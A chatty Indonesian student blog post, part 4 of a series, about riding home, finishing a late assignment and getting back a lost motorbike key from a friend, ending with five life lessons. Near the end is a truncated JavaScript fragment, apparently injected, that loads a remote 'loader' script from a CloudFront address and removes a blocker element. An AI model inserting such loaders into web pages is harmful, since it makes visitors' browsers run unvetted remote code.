The Longest Day Ever !! Part 4

Saya pun pulang dengan motor saya, dan kakak saya mengiringi dari belakang dengan motornya sendiri. Sama seperti saat perjalanan pergi, perjalanan pulang pun kondisi jalan masih tetap macet. Setelah lama mengarungi jalan, akhirnya kami sampai di rumah.

Sesampainya di rumah pukul 20.30 WIB saya langsung menyantap makan malam saya sambil teringat tugas mengumpumpulkan modul yang harus dikirimkan mala mini juga. Selain itu saya terfikir juga untuk menonton pertandingan EUFA EURO 2012 yang menayangkan pertandingan di Grup A. Tapi keinginan saya terpatahkan dengan tugas yang telah menunggu.

Setelah selesai makan malam saya pun bergegas sholat isha dan langsung menyalakan laptop untuk mengerjakan tugas modul tersebut. Saat saya melihat ponsel saya, ternyata ada pesan singkat yang dikirim dari Kak Alfi. Pesan itu berisi “De, kapan kamu mau kirim modulnya?”. Kemudian saya langsung membalas pesan tersebut dengan kata maaf baru membalas sms tersebut dan menjelaskan kejadian kehilangan kunci motor saya tadi. Kak Alfi pun dapat mengerti tentang hal tersebut dan akan menunggu kiriman tugas saya dengan sabar.

Dengan penuh perjuangan menahan kelopak mata ingin segera turun, saya pun menyelesaikan tugas tersebut. Saya langsung mengirimkan tugas itu ke email kak Alfi. Setelah mengirimkannya saya memberikan laporan kepada Kak Alfi bahwa saya telah mengirimkan tugas itu ke emailnya. Setelah semua selesai saya pun bergegas untuk tidur.

Keesokan harinya saya harus bersiap kembali untuk berangkat ke kampus di karenakan ada mata kuliah Softskill pukul 7.30 WIB. Walaupun saya bangun agak kesiangan, tetapi saya tetap malas-malasan untuk bersiap.

Selagi saya bersiap, ternyata di ponsel saya terdapat pesan masuk dari teman saya Fani. Saya pun membaca pesan tersebut. Pesan itu mengatakan “ada yang kehilangan kunci ga? Di tas gue ada konci gak tau puya siapa?” Saya pun terkejut dan langsung membalas pesan tersebut dengan mengatakan “ Gue fan!! Konci motor Beat gue ada gantungan ungunya.” Fani pun menjawab “Ada sama gue run.. Trus motor lo gimana?” Saya pun menjawab dengan singkat “Cerita di kelas.”

Setelah saya selesai bersiap, saya pun langsung bilang kepada ibu saya bahwa teman saya ada yang menemukan kunci motor saya di dalam tasnya.  Ibu saya sangat keheranan kenapa bisa ada di dalam tas teman saya tersebut. Saya pun belum bisa memberikan alasannya karena Fani pun belum menceritakannya dengan jelas. Karena rasa penasaran tersebut saya bergegas untuk berangkat ke kampus.

Sesampainya di kampus saya bertemu Fani, dan fani pun menceritakan awal ia menemukan kunci motor di dalam tas nya itu. Ternyata Fani sama herannya dengan saya mengapa kunci itu bisa ada di dalam tasnya tersebut. Saya menceritakan juga apa yang telah saya lakukan kemarin yang di karenakan hilangnya kunci motor tersebut. Akhirnya Fani pun mengembalikan kunci tersebut dan misteri kunci tersebut bisa ada di tas Fani pun belum terpecahkan.

Jika saya bisa simpulkan, dari serangkaian kejadian dam hari-hari saya tersebut, banyak sekali pelajaran yang bisa diambil. Yaitu :

  1. Janganlah Anda malas menge-charge ponsel Anda. Karena kita tidak akan pernah tahu kondisi apa yang akan kita hadapi di depan.
  2. Tutup rapat lah tas Anda agar barang-barang Anda tidak loncat-loncatan kemana-mana dan tidak nyasar ke tas orang lain.
  3. Selalu bawa barang berharga Anda kemana pun Anda pergi. Contohnya dengan membawa terus tas Anda kemana saja Anda pergi.
  4. Jangan pernah pantang menyerah untuk memperjuangkan sesuatu untuk kebaikan diri sendiri. Sepeti yang saya lakukan dengan memperjuangkan nilai UTS bahasa Indonesia saya agar dinaikan oleh dosen.
  5. Selalu berfikir positif dengan semua yang kita hadapi. Seperti dengan semua kejadian melelahkan yang lalui ini membantu saya untuk menyelesaikan tulisan softkill.

// -1?’https’:’http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};
// ]]>

Tinggalkan Balasan

